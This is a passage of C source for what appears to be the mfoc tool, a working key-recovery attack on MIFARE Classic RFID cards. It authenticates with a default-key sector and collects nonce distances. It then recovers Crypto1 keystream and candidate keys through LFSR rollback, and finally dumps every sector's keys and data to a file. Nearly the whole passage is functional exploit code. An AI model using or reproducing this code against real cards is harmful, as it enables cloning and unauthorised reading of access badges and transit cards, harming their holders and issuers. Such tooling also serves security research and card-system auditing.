if (!nfc_initiator_mifare_cmd(r.pdi,mc,t.sectors[j].trailer,&mp)) {
// fprintf(stdout, "!!Error: AUTH [Key A:%012llx] sector %02x t_block %02x, key %d\n",
// bytes_to_num(mp.mpa.abtKey, 6), j, t.sectors[j].trailer, o);
mf_anticollision(t, r);
} else {
// Save all information about successfull authentization
if (dumpKeysA) {
memcpy(t.sectors[j].KeyA, mp.mpa.abtKey, sizeof(mp.mpa.abtKey));
t.sectors[j].foundKeyA = true;
} else {
memcpy(t.sectors[j].KeyB, mp.mpa.abtKey, sizeof(mp.mpa.abtKey));
t.sectors[j].foundKeyB = true;
}
printf("Sector: %d, type %c\n", j, (dumpKeysA ? 'A' : 'B'));
fprintf(stdout, "Found Key: %c [%012llx]\n", (dumpKeysA ? 'A' : 'B'),
bytes_to_num(mp.mpa.abtKey, 6));
mf_configure(r.pdi);
mf_anticollision(t, r);
skip = true;
break;
}
}
if (skip) continue; // We have already revealed key, go to the next iteration
// Max probes for auth for each sector
for (k = 0; k < probes; ++k) {
// Try to authenticate to exploit sector and determine distances (filling denonce.distances)
mf_enhanced_auth(e_sector, 0, t, r, &d, pk, 'd', dumpKeysA); // AUTH + Get Distances mode
printf("Sector: %d, type %c, probe %d, distance %d ", j, (dumpKeysA ? 'A' : 'B'), k, d.median);
// Configure device to the previous state
mf_configure(r.pdi);
mf_anticollision(t, r);
pk->possibleKeys = NULL;
pk->size = 0;
// We have 'sets' * 32b keystream of potential keys
for (n = 0; n < sets; n++) {
// AUTH + Recovery key mode (for a_sector), repeat 5 times
mf_enhanced_auth(e_sector, t.sectors[j].trailer, t, r, &d, pk, 'r', dumpKeysA);
mf_configure(r.pdi);
mf_anticollision(t, r);
fprintf(stdout, ".");
fflush(stdout);
}
fprintf(stdout, "\n");
// Get first 15 grouped keys
ck = uniqsort(pk->possibleKeys, pk->size);
for (i = 0; i < TRY_KEYS ; i++) {
// We don't known this key, try to break it
// This key can be found here two or more times
if (ck[i].count > 0) {
// fprintf(stdout,"%d %llx\n",ck[i].count, ck[i].key);
// Set required authetication method
num_to_bytes(ck[i].key, 6, mp.mpa.abtKey);
mc = dumpKeysA ? 0x60 : 0x61;
if (!nfc_initiator_mifare_cmd(r.pdi,mc,t.sectors[j].trailer,&mp)) {
// fprintf(stdout, "!!Error: AUTH [Key A:%llx] sector %02x t_block %02x\n",
// bytes_to_num(mp.mpa.abtKey, 6), j, t.sectors[j].trailer);
mf_anticollision(t, r);
} else {
// Save all information about successfull authentization
bk->size++;
bk->brokenKeys = (uint64_t *) realloc((void *)bk->brokenKeys, bk->size * sizeof(uint64_t));
bk->brokenKeys[bk->size-1] = bytes_to_num(mp.mpa.abtKey, 6);
if (dumpKeysA) {
memcpy(t.sectors[j].KeyA, mp.mpa.abtKey, sizeof(mp.mpa.abtKey));
t.sectors[j].foundKeyA = true;
} else {
memcpy(t.sectors[j].KeyB, mp.mpa.abtKey, sizeof(mp.mpa.abtKey));
t.sectors[j].foundKeyB = true;
}
fprintf(stdout, "Found Key: %c [%012llx]\n", (dumpKeysA ? 'A' : 'B'),
bytes_to_num(mp.mpa.abtKey, 6));
mf_configure(r.pdi);
mf_anticollision(t, r);
break;
}
}
}
free(pk->possibleKeys);
free(ck);
// Success, try the next sector
if ((dumpKeysA && t.sectors[j].foundKeyA) || (!dumpKeysA && t.sectors[j].foundKeyB)) break;
}
// We haven't found any key, exiting
if ((dumpKeysA && !t.sectors[j].foundKeyA) || (!dumpKeysA && !t.sectors[j].foundKeyB)) {
fprintf(stderr, "No success, maybe you should increase the probes\n");
exit(1);
}
}
}
dumpKeysA = false;
}
for (i = 0; i < (t.num_sectors); ++i) {
if ((dumpKeysA && !t.sectors[i].foundKeyA) || (!dumpKeysA && !t.sectors[i].foundKeyB)) {
fprintf(stdout, "\nTry again, there are still some encrypted blocks\n");
succeed = 0;
break;
}
}
if (succeed) {
i = t.num_sectors; // Sector counter
fprintf(stdout, "Auth with all sectors succeeded, dumping keys to a file!\n");
// Read all blocks
for (block = t.num_blocks; block >= 0; block--) {
trailer_block(block) ? i-- : i;
failure = true;
// Try A key, auth() + read()
memcpy(mp.mpa.abtKey, t.sectors[i].KeyA, sizeof(t.sectors[i].KeyA));
if (!nfc_initiator_mifare_cmd(r.pdi, MC_AUTH_A, block, &mp)) {
// fprintf(stderr, "Error: Auth A\n");
mf_configure(r.pdi);
mf_anticollision(t, r);
} else { // and Read
if (nfc_initiator_mifare_cmd(r.pdi, MC_READ, block, &mp)) {
fprintf(stdout, "Block %02d, type %c, key %012llx :", block, 'A', bytes_to_num(t.sectors[i].KeyA, 6));
print_hex(mp.mpd.abtData, 16);
mf_configure(r.pdi);
mf_select_tag(r.pdi, &t.ti);
failure = false;
} else {
// Error, now try read() with B key
// fprintf(stderr, "Error: Read A\n");
mf_configure(r.pdi);
mf_anticollision(t, r);
memcpy(mp.mpa.abtKey, t.sectors[i].KeyB, sizeof(t.sectors[i].KeyB));
if (!nfc_initiator_mifare_cmd(r.pdi, MC_AUTH_B, block, &mp)) {
// fprintf(stderr, "Error: Auth B\n");
mf_configure(r.pdi);
mf_anticollision(t, r);
} else { // and Read
if (nfc_initiator_mifare_cmd(r.pdi, MC_READ, block, &mp)) {
fprintf(stdout, "Block %02d, type %c, key %012llx :", block, 'B', bytes_to_num(t.sectors[i].KeyB, 6));
print_hex(mp.mpd.abtData, 16);
mf_configure(r.pdi);
mf_select_tag(r.pdi, &t.ti);
failure = false;
} else {
mf_configure(r.pdi);
mf_anticollision(t, r);
// fprintf(stderr, "Error: Read B\n");
}
}
}
}
if (trailer_block(block)) {
// Copy the keys over from our key dump and store the retrieved access bits
memcpy(mtDump.amb[block].mbt.abtKeyA, t.sectors[i].KeyA,6);
memcpy(mtDump.amb[block].mbt.abtKeyB,t.sectors[i].KeyB,6);
if (!failure) memcpy(mtDump.amb[block].mbt.abtAccessBits,mp.mpd.abtData+6,4);
} else if (!failure) memcpy(mtDump.amb[block].mbd.abtData, mp.mpd.abtData,16);
memcpy(mp.mpa.abtUid,t.ti.nai.abtUid,4);
}
// Finally save all keys + data to file
if (fwrite(&mtDump, 1, sizeof(mtDump), pfDump) != sizeof(mtDump)) {
fprintf(stdout, "Error, cannot write dump\n");
fclose(pfDump);
exit(1);
}
fclose(pfDump);
}
free(t.sectors);
free(d.distances);
// Reset the "advanced" configuration to normal
nfc_configure(r.pdi, NDO_HANDLE_CRC, true);
nfc_configure(r.pdi, NDO_HANDLE_PARITY, true);
// Disconnect device and exit
nfc_disconnect(r.pdi);
return 0;
}
void usage(FILE * stream, int errno) {
fprintf(stream, "mfoc %s\n\n", PACKAGE_STRING);
fprintf(stream, "usage: mfoc [-h] [-P probnum] [-T tolerance] [-k custom_key] [-O output]\n\n");
fprintf(stream, "example: mfoc\n");
fprintf(stream, "example: mfoc -k ffffeeeedddd -O card_dump\n");
fprintf(stream, "example: mfoc -P 50 -O card_dump\n");
fprintf(stream, "\n");
fprintf(stream, " h : print this help\n");
// fprintf(stream, " B : instead of 'A' dump 'B' keys\n");
fprintf(stream, " k : use a specified key instead of looking for defaults ones\n");
// fprintf(stream, " D : number of distance probes, default is 20\n");
// fprintf(stream, " S : number of sets with keystreams, default is 5\n");
fprintf(stream, " P : number of probes for a key recovery for one sector, default is 20\n");
fprintf(stream, " T : range for a possible distance tolerance, default is 20 (40 in both direction)\n");
// fprintf(stream, " s : specify the list of sectors to crack, for example -s 0,1,3,5\n");
fprintf(stream, " O : dump file where the revealed keys should be stored\n");
fprintf(stream, "\n");
exit(errno);
}
void mf_init(mftag *t, mfreader *r) {
// Connect to the first NFC device
r->pdi = nfc_connect(NULL);
if (!r->pdi) {
fprintf(stderr, "!Error connecting to the NFC reader\n");
exit(1);
}
}
void mf_configure(nfc_device_t* pdi) {
nfc_initiator_init(pdi);
// Drop the field for a while, so can be reset
nfc_configure(pdi,NDO_ACTIVATE_FIELD,false);
// Let the reader only try once to find a tag
nfc_configure(pdi,NDO_INFINITE_SELECT,false);
// Configure the CRC and Parity settings
nfc_configure(pdi,NDO_HANDLE_CRC,true);
nfc_configure(pdi,NDO_HANDLE_PARITY,true);
// Enable the field so more power consuming cards can power themselves up
nfc_configure(pdi,NDO_ACTIVATE_FIELD,true);
}
void mf_select_tag(nfc_device_t* pdi, nfc_target_info_t* ti) {
// Poll for a ISO14443A (MIFARE) tag
if (!nfc_initiator_select_tag(pdi,NM_ISO14443A_106,NULL,0,ti)) {
fprintf(stderr, "!Error connecting to the MIFARE Classic tag\n");
nfc_disconnect(pdi);
exit(1);
}
}
int trailer_block(uint32_t block)
{
// Test if we are in the small or big sectors
return (block < 128) ? ((block + 1) % 4 == 0) : ((block + 1) % 16 == 0);
}
// Return position of sector if it is encrypted with the default key otherwise exit..
int find_exploit_sector(mftag t) {
int i;
bool interesting = false;
for (i = 0; i < t.num_sectors; i++) {
if (!t.sectors[i].foundKeyA || !t.sectors[i].foundKeyB) {
interesting = true;
break;
}
}
if (!interesting) {
fprintf(stdout, "\nWe have all sectors encrypted with the default keys..\n\n");
return -1;
}
for (i = 0; i < t.num_sectors; i++) {
if ((t.sectors[i].foundKeyA) || (t.sectors[i].foundKeyB)) {
fprintf(stdout, "\n\nUsing sector %02d as an exploit sector\n", i);
return i;
}
}
fprintf(stderr, "\n\nNo sector encrypted with the default key has been found, exiting..\n");
exit(1);
}
void mf_anticollision(mftag t, mfreader r) {
if (!nfc_initiator_select_tag(r.pdi, NM_ISO14443A_106, NULL, 0, &t.ti)) {
fprintf(stderr, "\n\n!Error: tag has been removed\n");
exit(1);
}
}
int mf_enhanced_auth(int e_sector, int a_sector, mftag t, mfreader r, denonce *d, pKeys *pk, char mode, bool dumpKeysA) {
struct Crypto1State* pcs;
struct Crypto1State* revstate;
struct Crypto1State* revstate_start;
uint64_t lfsr;
// Possible key counter, just continue with a previous "session"
uint32_t kcount = pk->size;
byte_t Nr[4] = { 0x00,0x00,0x00,0x00 }; // Reader nonce
byte_t Auth[4] = { 0x00, t.sectors[e_sector].trailer, 0x00, 0x00 };
byte_t AuthEnc[4] = { 0x00, t.sectors[e_sector].trailer, 0x00, 0x00 };
byte_t AuthEncPar[8] = { 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 };
byte_t ArEnc[8] = { 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 };
byte_t ArEncPar[8] = { 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 };
byte_t Rx[MAX_FRAME_LEN]; // Tag response
byte_t RxPar[MAX_FRAME_LEN]; // Tag response
size_t RxLen;
u_int32_t Nt, NtLast, NtProbe, NtEnc, Ks1;
int i, m;
// Prepare AUTH command
Auth[0] = (t.sectors[e_sector].foundKeyA) ? 0x60 : 0x61;
append_iso14443a_crc(Auth,2);
// fprintf(stdout, "\nAuth command:\t");
// print_hex(Auth, 4);
// We need full control over the CRC
nfc_configure(r.pdi,NDO_HANDLE_CRC,false);
// Request plain tag-nonce
// fprintf(stdout, "\t[Nt]:\t");
if (!nfc_initiator_transceive_bytes(r.pdi, Auth, 4, Rx, &RxLen)) {
fprintf(stdout, "Error requesting plain tag-nonce\n");
exit(1);
}
// print_hex(Rx, 4);
// Save the tag nonce (Nt)
Nt = bytes_to_num(Rx, 4);
// Init the cipher with key {0..47} bits
if (t.sectors[e_sector].foundKeyA) {
pcs = crypto1_create(bytes_to_num(t.sectors[e_sector].KeyA, 6));
} else {
pcs = crypto1_create(bytes_to_num(t.sectors[e_sector].KeyB, 6));
}
// Load (plain) uid^nt into the cipher {48..79} bits
crypto1_word(pcs, bytes_to_num(Rx, 4) ^ t.uid, 0);
// Generate (encrypted) nr+parity by loading it into the cipher
for (i = 0; i < 4; i++) {
// Load in, and encrypt the reader nonce (Nr)
ArEnc[i] = crypto1_byte(pcs, Nr[i], 0) ^ Nr[i];
ArEncPar[i] = filter(pcs->odd) ^ oddparity(Nr[i]);
}
// Skip 32 bits in the pseudo random generator
Nt = prng_successor(Nt, 32);
// Generate reader-answer from tag-nonce
for (i = 4; i < 8; i++) {
// Get the next random byte
Nt = prng_successor(Nt, 8);
// Encrypt the reader-answer (Nt' = suc2(Nt))
ArEnc[i] = crypto1_byte(pcs, 0x00, 0) ^ (Nt&0xff);
ArEncPar[i] = filter(pcs->odd) ^ oddparity(Nt);
}
// Finally we want to send arbitrary parity bits
nfc_configure(r.pdi, NDO_HANDLE_PARITY, false);
// Transmit reader-answer
// fprintf(stdout, "\t{Ar}:\t");
// print_hex_par(ArEnc, 64, ArEncPar);
if ((!nfc_initiator_transceive_bits(r.pdi, ArEnc, 64, ArEncPar, Rx, &RxLen, RxPar)) || (RxLen != 32)) {
fprintf(stderr, "Reader-answer transfer error, exiting..\n");
exit(1);
}
// Now print the answer from the tag
// fprintf(stdout, "\t{At}:\t");
// print_hex_par(Rx,RxLen,RxPar);
// Decrypt the tag answer and verify that suc3(Nt) is At
Nt = prng_successor(Nt, 32);
if (!((crypto1_word(pcs, 0x00, 0) ^ bytes_to_num(Rx, 4)) == (Nt&0xFFFFFFFF))) {
fprintf(stderr, "[At] is not Suc3(Nt), something is wrong, exiting..\n");
exit(1);
}
// fprintf(stdout, "Authentication completed.\n\n");
// If we are in "Get Distances" mode
if (mode == 'd') {
for (m = 0; m < d->num_distances; m++) {
// fprintf(stdout, "Nested Auth number: %x: ,", m);
// Encrypt Auth command with the current keystream
for (i = 0; i < 4; i++) {
AuthEnc[i] = crypto1_byte(pcs,0x00,0) ^ Auth[i];
// Encrypt the parity bits with the 4 plaintext bytes
AuthEncPar[i] = filter(pcs->odd) ^ oddparity(Auth[i]);
}
// Sending the encrypted Auth command
if (!nfc_initiator_transceive_bits(r.pdi, AuthEnc, 32, AuthEncPar,Rx, &RxLen, RxPar)) {
fprintf(stdout, "Error requesting encrypted tag-nonce\n");
exit(1);
}
// Decrypt the encrypted auth
if (t.sectors[e_sector].foundKeyA) {
pcs = crypto1_create(bytes_to_num(t.sectors[e_sector].KeyA, 6));
} else {
pcs = crypto1_create(bytes_to_num(t.sectors[e_sector].KeyB, 6));
}
NtLast = bytes_to_num(Rx, 4) ^ crypto1_word(pcs, bytes_to_num(Rx, 4) ^ t.uid, 1);
// Save the determined nonces distance
d->distances[m] = nonce_distance(Nt, NtLast);
// fprintf(stdout, "distance: %05d\n", d->distances[m]);
// Again, prepare and send {At}
for (i = 0; i < 4; i++) {
ArEnc[i] = crypto1_byte(pcs, Nr[i], 0) ^ Nr[i];
ArEncPar[i] = filter(pcs->odd) ^ oddparity(Nr[i]);
}
Nt = prng_successor(NtLast, 32);
for (i = 4; i < 8; i++) {
Nt = prng_successor(Nt, 8);
ArEnc[i] = crypto1_byte(pcs, 0x00, 0) ^ (Nt&0xFF);
ArEncPar[i] = filter(pcs->odd) ^ oddparity(Nt);
}
nfc_configure(r.pdi,NDO_HANDLE_PARITY,false);
if ((!nfc_initiator_transceive_bits(r.pdi, ArEnc, 64, ArEncPar, Rx, &RxLen, RxPar)) || (RxLen != 32)) {
fprintf(stderr, "Reader-answer transfer error, exiting..\n");
exit(1);
}
Nt = prng_successor(Nt, 32);
if (!((crypto1_word(pcs, 0x00, 0) ^ bytes_to_num(Rx, 4)) == (Nt&0xFFFFFFFF))) {
fprintf(stderr, "[At] is not Suc3(Nt), something is wrong, exiting..\n");
exit(1);
}
} // Next auth probe
// Find median from all distances
d->median = median(*d);
//fprintf(stdout, "Median: %05d\n", d->median);
} // The end of Get Distances mode
// If we are in "Get Recovery" mode
if (mode == 'r') {
// Again, prepare the Auth command with MC_AUTH_A, recover the block and CRC
Auth[0] = dumpKeysA ? 0x60 : 0x61;
Auth[1] = a_sector;
append_iso14443a_crc(Auth,2);
// Encryption of the Auth command, sending the Auth command
for (i = 0; i < 4; i++) {
AuthEnc[i] = crypto1_byte(pcs,0x00,0) ^ Auth[i];
// Encrypt the parity bits with the 4 plaintext bytes
AuthEncPar[i] = filter(pcs->odd) ^ oddparity(Auth[i]);
}
if (!nfc_initiator_transceive_bits(r.pdi, AuthEnc, 32, AuthEncPar,Rx, &RxLen, RxPar)) {
fprintf(stdout, "Error requesting encrypted tag-nonce\n");
exit(1);
}
// Save the encrypted nonce
NtEnc = bytes_to_num(Rx, 4);
// Parity validity check
for (i = 0; i < 3; ++i) {
d->parity[i] = (oddparity(Rx[i]) != RxPar[i]);
}
// Iterate over Nt-x, Nt+x
// fprintf(stdout, "Iterate from %d to %d\n", d->median-TOLERANCE, d->median+TOLERANCE);
NtProbe = prng_successor(Nt, d->median-d->tolerance);
for (m = d->median-d->tolerance; m <= d->median+d->tolerance; m +=2) {
// Try to recover the keystream1
Ks1 = NtEnc ^ NtProbe;
// Skip this nonce after invalid 3b parity check
revstate_start = NULL;
if (valid_nonce(NtProbe, NtEnc, Ks1, d->parity)) {
// And finally recover the first 32 bits of the key
revstate = lfsr_recovery32(Ks1, NtProbe ^ t.uid);
if (revstate_start == NULL) {
revstate_start = revstate;
}
while ((revstate->odd != 0x0) || (revstate->even != 0x0)) {
lfsr_rollback_word(revstate, NtProbe ^ t.uid, 0);
crypto1_get_lfsr(revstate, &lfsr);
// Allocate a new space for keys
if (((kcount % MEM_CHUNK) == 0) || (kcount >= pk->size)) {
pk->size += MEM_CHUNK;
// fprintf(stdout, "New chunk by %d, sizeof %lu\n", kcount, pk->size * sizeof(uint64_t));
pk->possibleKeys = (uint64_t *) realloc((void *)pk->possibleKeys, pk->size * sizeof(uint64_t));
if (pk->possibleKeys == NULL) {
fprintf(stderr, "Memory allocation error for pk->possibleKeys\n");
exit(1);
}
}
pk->possibleKeys[kcount] = lfsr;
kcount++;
revstate++;
}
free(revstate_start);
}
NtProbe = prng_successor(NtProbe, 2);
}
// Truncate
if (kcount != 0) {
pk->size = --kcount;
if ((pk->possibleKeys = (uint64_t *) realloc((void *)pk->possibleKeys, pk->size * sizeof(uint64_t))) == NULL) {
fprintf(stderr, "Memory allocation error for pk->possibleKeys\n");
exit(1);
}
}
}
crypto1_destroy(pcs);
return 0;
}
// Return the median value from the nonce distances array
uint32_t median(denonce d) {
int middle = (int) d.num_distances / 2;
qsort(d.distances, d.num_distances, sizeof(u_int32_t), compar_int);
if (d.num_distances % 2 == 1) {
// Odd number of elements
return d.distances[middle];
} else {
// Even number of elements, return the smaller value
return (uint32_t) (d.distances[middle-1]);
}
}
int compar_int(const void * a, const void * b) {
return (*(uint64_t*)b - *(uint64_t*)a);
}
// Compare countKeys structure
int compar_special_int(const void * a, const void * b) {
return (((countKeys *)b)->count - ((countKeys *)a)->count);
}
countKeys * uniqsort(uint64_t * possibleKeys, uint32_t size) {
int i, j = 0;
int count = 0;
countKeys *our_counts;
qsort(possibleKeys, size, sizeof (uint64_t), compar_int);
our_counts = calloc(size, sizeof(countKeys));
if (our_counts == NULL) {
fprintf(stderr, "Memory allocation error for our_counts\n");
exit(1);
}
for (i = 0; i < size; i++) {
if (possibleKeys[i+1] == possibleKeys[i]) {
count++;
} else {
our_counts[j].key = possibleKeys[i];
our_counts[j].count = count;
j++;
count=0;
}
}
qsort(our_counts, j, sizeof(countKeys), compar_special_int);
return (our_counts);
}
// Return 1 if the nonce is invalid else return 0
int valid_nonce(uint32_t Nt, uint32_t NtEnc, uint32_t Ks1, byte_t * parity) {
return ((odd_parity((Nt >> 24) & 0xFF) == ((parity[0]) ^ odd_parity((NtEnc >> 24) & 0xFF) ^ BIT(Ks1,16))) & \
(odd_parity((Nt >> 16) & 0xFF) == ((parity[1]) ^ odd_parity((NtEnc >> 16) & 0xFF) ^ BIT(Ks1,8))) & \
(odd_parity((Nt >> 8) & 0xFF) == ((parity[2]) ^ odd_parity((NtEnc >> 8) & 0xFF) ^ BIT(Ks1,0)))) ? 1 : 0;
}
void num_to_bytes(uint64_t n, uint32_t len, byte_t* dest) {
while (len--) {
dest[len] = (byte_t) n;
n >>= 8;
}
}
long long unsigned int bytes_to_num(byte_t* src, uint32_t len) {
uint64_t num = 0;
while (len--)
{
num = (num << 8) | (*src);
src++;
}
return num;
}

86
src/mfoc.h Normal file
View File

@@ -0,0 +1,86 @@
#define MEM_CHUNK 10000
#define TRY_KEYS 50
// Number of trailers == number of sectors
// 16x64b = 16
#define NR_TRAILERS_1k (16)
// 32x64b + 8*256b = 40
#define NR_TRAILERS_4k (40)
#define MAX_FRAME_LEN 264
// Used for counting nonce distances, explore [nd-value, nd+value]
#define DEFAULT_TOLERANCE 20
// Default number of distance probes
#define DEFAULT_DIST_NR 15
// Default number of probes for a key recovery for one sector
#define DEFAULT_PROBES_NR 150
// Number of sets with 32b keys
#define DEFAULT_SETS_NR 5
#define odd_parity(i) (( (i) ^ (i)>>1 ^ (i)>>2 ^ (i)>>3 ^ (i)>>4 ^ (i)>>5 ^ (i)>>6 ^ (i)>>7 ^ 1) & 0x01)
typedef struct {
byte_t KeyA[6];
byte_t KeyB[6];
bool foundKeyA;
bool foundKeyB;
byte_t trailer; // Value of a trailer block
} sector;
typedef struct {
u_int32_t *distances;
u_int32_t median;
u_int32_t num_distances;
u_int32_t tolerance;
byte_t parity[3]; // used for 3 bits of parity information
} denonce; // Revealed information about nonce
typedef struct {
nfc_target_info_t ti;
sector * sectors; // Allocate later, we do not know the number of sectors yet
sector e_sector; // Exploit sector
uint32_t num_sectors;
uint32_t num_blocks;
uint32_t uid;
bool b4K;
} mftag;
typedef struct {
uint64_t *possibleKeys;
uint32_t size;
} pKeys;
typedef struct {
uint64_t *brokenKeys;
uint32_t size;
} bKeys;
typedef struct {
nfc_device_t *pdi;
} mfreader;
typedef struct {
uint64_t key;
int count;
} countKeys;
void usage(FILE * stream, int errno);
void mf_init(mftag *t, mfreader *r);
void mf_configure(nfc_device_t* pdi);
void mf_select_tag(nfc_device_t* pdi, nfc_target_info_t* ti);
int trailer_block(uint32_t block);
int find_exploit_sector(mftag t);
void mf_anticollision(mftag t, mfreader r);
int mf_enhanced_auth(int e_sector, int a_sector, mftag t, mfreader r, denonce *d, pKeys *pk, char mode, bool dumpKeysA);
uint32_t median(denonce d);
int compar_int(const void * a, const void * b);
int valid_nonce(uint32_t Nt, uint32_t NtEnc, uint32_t Ks1, byte_t * parity);
int compar_special_int(const void * a, const void * b);
countKeys * uniqsort(uint64_t *possibleKeys, uint32_t size);
void num_to_bytes(uint64_t n, uint32_t len, byte_t* dest);
long long unsigned int bytes_to_num(byte_t* src, uint32_t len);